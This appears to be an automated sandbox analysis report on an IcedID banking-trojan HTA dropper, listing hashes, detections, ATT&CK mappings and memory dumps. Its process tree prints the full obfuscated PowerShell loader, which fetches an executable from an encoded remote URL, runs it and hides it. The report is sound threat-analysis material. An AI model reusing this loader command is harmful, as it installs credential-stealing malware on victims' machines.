icedid | f59531b810bcbc677907e9fa2be65187b3ee4cd980f633775cc8b2186f3e83d2

Analysis

max time kernel
144s
max time network
185s
platform
windows10_x64
resource
win10-20220414-en
submitted
23-05-2022 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

093789.hta
Size

127KB
MD5

9ded224c99c7fa6179d5a8a86278ad85
SHA1

30795cf7e98050d7e39cd98d649c82eb3345b537
SHA256

f59531b810bcbc677907e9fa2be65187b3ee4cd980f633775cc8b2186f3e83d2
SHA512

7282fcea1b6e66a88c3267b62da7708c7a44ac1bba1d49a9156a2b139eca41aa029b6275e875c819b35e3a4ad40421090687d6017cf1bdb5e7e4d955f41f80d6

Score

10^/10

icedid 3826577017 banker suricata trojan

Malware Config

Extracted

Family

icedid

Campaign

3826577017

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 4756 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

listbul.exe

pid process

4524 listbul.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exelistbul.exe

pid process

4756 powershell.exe
4756 powershell.exe
4756 powershell.exe
4524 listbul.exe
4524 listbul.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4756 powershell.exe

flow	pid	process
3	4756	powershell.exe

pid	process
4524	listbul.exe

pid	process
4756	powershell.exe
4756	powershell.exe
4756	powershell.exe
4524	listbul.exe
4524	listbul.exe

description	pid	process
Token: SeDebugPrivilege	4756	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

mshta.exepowershell.exe

description	pid	process	target process
PID 3768 wrote to memory of 4756	3768	mshta.exe	powershell.exe
PID 3768 wrote to memory of 4756	3768	mshta.exe	powershell.exe
PID 3768 wrote to memory of 4756	3768	mshta.exe	powershell.exe
PID 4756 wrote to memory of 4524	4756	powershell.exe	listbul.exe
PID 4756 wrote to memory of 4524	4756	powershell.exe	listbul.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\093789.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Suspicious use of WriteProcessMemory
PID:3768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function nCnooqTAqqv($QdURf, $SEYBaBhoIslxYPUV){[IO.File]::WriteAllBytes($QdURf, $SEYBaBhoIslxYPUV)};function QAzvkVkWZKPhOlpwa($QdURf){if($QdURf.EndsWith((QDkoMPlVzgvEWb @(30423,30477,30485,30485))) -eq $True){Start-Process (QDkoMPlVzgvEWb @(30491,30494,30487,30477,30485,30485,30428,30427,30423,30478,30497,30478)) $QdURf}else{Start-Process $QdURf}};function YsIYHktLTMVWIvzUh($nCnooqTAqqv){$ecJaJAhGPmfW=(QDkoMPlVzgvEWb @(30449,30482,30477,30477,30478,30487));$RIvPMcRPXzSlzdUz=(Get-ChildItem $nCnooqTAqqv -Force);$RIvPMcRPXzSlzdUz.Attributes=$RIvPMcRPXzSlzdUz.Attributes -bor ([IO.FileAttributes]$ecJaJAhGPmfW).value__};function bVazdUVuxUCcQ($mzZXDpWHMkgEkOZlpo){$RCioLomLbFWGQm = New-Object (QDkoMPlVzgvEWb @(30455,30478,30493,30423,30464,30478,30475,30444,30485,30482,30478,30487,30493));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$SEYBaBhoIslxYPUV = $RCioLomLbFWGQm.DownloadData($mzZXDpWHMkgEkOZlpo);return $SEYBaBhoIslxYPUV};function QDkoMPlVzgvEWb($jzzWZJsPzTOl){$tvsGvJHglahxnk=30377;$krNRlGUuUlODLgvC=$Null;foreach($CPZauqTUJNyjB in $jzzWZJsPzTOl){$krNRlGUuUlODLgvC+=[char]($CPZauqTUJNyjB-$tvsGvJHglahxnk)};return $krNRlGUuUlODLgvC};function JRBipYACihIRzaGss(){$xakjXRXNpt = $env:Homepath + '\';$mSdCwKYAfKJ = $xakjXRXNpt + 'listbul.exe'; if (Test-Path -Path $mSdCwKYAfKJ){QAzvkVkWZKPhOlpwa $mSdCwKYAfKJ;}Else{ $GBZkQ = bVazdUVuxUCcQ (QDkoMPlVzgvEWb @(30481,30493,30493,30489,30492,30435,30424,30424,30481,30478,30476,30493,30488,30491,30476,30474,30485,30485,30478,30423,30476,30488,30486,30424,30485,30482,30492,30493,30475,30494,30485,30423,30478,30497,30478));nCnooqTAqqv $mSdCwKYAfKJ $GBZkQ;QAzvkVkWZKPhOlpwa $mSdCwKYAfKJ;};YsIYHktLTMVWIvzUh $mSdCwKYAfKJ;;;;;}JRBipYACihIRzaGss;
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4756

C:\Users\Admin\listbul.exe
"C:\Users\Admin\listbul.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4524

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\listbul.exe
Filesize
2.9MB

MD5
8970a3db9f39923a4ef16fb39cd8acc5

SHA1
caaca63a223df4aa52e37850cad18274aab9cb96

SHA256
1e3d10c3c84d7617692174a1f9ae8a658eabb22c7122ef1c8f37f35641ccf7aa

SHA512
5f3f7449c79d1f7ca75940366fb5abc8d30fd6a336431ad1a47c4530a64cb93bbf4d7ccbcb22756f04971e2d8cd987d5acc7bdb32cbb16ec3b15b49eef5309bb

Download Submit
C:\Users\Admin\listbul.exe
Filesize
2.9MB

MD5
8970a3db9f39923a4ef16fb39cd8acc5

SHA1
caaca63a223df4aa52e37850cad18274aab9cb96

SHA256
1e3d10c3c84d7617692174a1f9ae8a658eabb22c7122ef1c8f37f35641ccf7aa

SHA512
5f3f7449c79d1f7ca75940366fb5abc8d30fd6a336431ad1a47c4530a64cb93bbf4d7ccbcb22756f04971e2d8cd987d5acc7bdb32cbb16ec3b15b49eef5309bb

Download Submit
memory/3768-118-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-119-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-120-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-121-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-122-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-123-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-124-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-125-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-126-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-127-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-128-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-129-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-130-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-131-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-132-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-133-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-134-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-135-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-136-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-137-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-138-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-139-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-140-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-141-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-142-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-143-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-144-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-145-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-146-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-147-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-148-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-149-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-150-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-151-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-152-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-153-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-154-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-155-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-156-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-157-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-158-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-159-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-160-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-161-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-162-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-163-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-164-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-165-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-166-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-167-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-168-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-169-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-170-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-171-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-172-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-173-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-174-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-175-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-176-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-178-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-177-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-179-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-180-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/3768-181-0x00000000773B0000-0x000000007753E000-memory.dmp

Filesize
1.6MB

Download
memory/4524-324-0x0000000000000000-mapping.dmp

Download
memory/4756-198-0x0000000000000000-mapping.dmp

Download
memory/4756-234-0x0000000004A10000-0x0000000004A46000-memory.dmp

Filesize
216KB

Download
memory/4756-239-0x00000000075D0000-0x0000000007BF8000-memory.dmp

Filesize
6.2MB

Download
memory/4756-254-0x00000000073B0000-0x00000000073D2000-memory.dmp

Filesize
136KB

Download
memory/4756-259-0x0000000007550000-0x00000000075B6000-memory.dmp

Filesize
408KB

Download
memory/4756-260-0x0000000007C00000-0x0000000007C66000-memory.dmp

Filesize
408KB

Download
memory/4756-261-0x0000000007F50000-0x00000000082A0000-memory.dmp

Filesize
3.3MB

Download
memory/4756-264-0x0000000007CC0000-0x0000000007CDC000-memory.dmp

Filesize
112KB

Download
memory/4756-265-0x00000000084F0000-0x000000000853B000-memory.dmp

Filesize
300KB

Download
memory/4756-269-0x00000000085C0000-0x0000000008636000-memory.dmp

Filesize
472KB

Download
memory/4756-280-0x0000000009660000-0x00000000096F4000-memory.dmp

Filesize
592KB

Download
memory/4756-281-0x0000000009370000-0x000000000938A000-memory.dmp

Filesize
104KB

Download
memory/4756-282-0x00000000095C0000-0x00000000095E2000-memory.dmp

Filesize
136KB

Download
memory/4756-283-0x0000000009C70000-0x000000000A16E000-memory.dmp

Filesize
5.0MB

Download
memory/4756-288-0x000000000A7F0000-0x000000000AE68000-memory.dmp

Filesize
6.5MB

Download